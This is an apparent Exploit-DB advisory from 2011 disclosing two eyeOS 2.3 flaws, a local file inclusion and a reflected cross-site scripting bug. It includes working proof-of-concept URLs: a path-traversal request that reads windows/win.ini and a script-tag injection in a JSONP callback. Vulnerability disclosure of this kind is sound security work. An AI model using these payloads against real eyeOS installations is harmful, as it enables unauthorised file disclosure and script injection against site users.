eyeos 2.3 - Multiple Vulnerabilities

EDB-ID:

17127


Platform:

PHP

Published:

2011-04-06

------------------------------------------------------------------------
Software................eyeOS 2.3
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://www.eyeos.org/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A local file inclusion vulnerability in eyeOS 2.3 can be exploited to
include arbitrary files.


--PoC--

http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/part/delay.php?sleep=0&file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini

------------------------------------------------------------------------
Software................eyeOS 2.3
Vulnerability...........Reflected Cross-site Scripting
Threat Level............Low (1/5)
Download................http://www.eyeos.org/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <john@autosectools.com>
------------------------------------------------------------------------


--Description--

A reflected cross-site scripting vulnerability in eyeOS 2.3 can be
exploited to execute arbitrary JavaScript.


--PoC--

http://localhost/eyeos/devtools/qooxdoo-sdk/framework/source/resource/qx/test/jsonp_primitive.php?callback=%3Cscript%3Ealert%280%29%3C%2fscript%3E